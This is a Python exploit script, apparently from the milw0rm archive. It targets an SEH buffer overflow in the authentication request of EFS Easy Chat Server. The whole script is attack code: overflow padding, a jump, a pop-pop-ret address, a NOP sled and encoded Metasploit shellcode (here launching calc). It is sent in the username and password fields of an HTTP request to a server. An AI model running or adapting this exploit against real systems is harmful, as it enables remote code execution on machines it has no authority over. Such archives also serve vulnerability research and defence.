#!/usr/bin/python
#[*] Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
#[*] Refer : http://www.milw0rm.com/exploits/4289
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ)
import struct
import socket
buf = "\x41"*216
buf += "\xEB\x06\xAE\xFA" #jmp+6
buf += "\xB6\xB2\x01\x10" #universal pop pop ret
buf += "\x90"*19
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf+=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")
head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n"
head += "Host: 127.0.0.1\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "\r\n\r\n")
s.close()
# milw0rm.com [2009-03-03]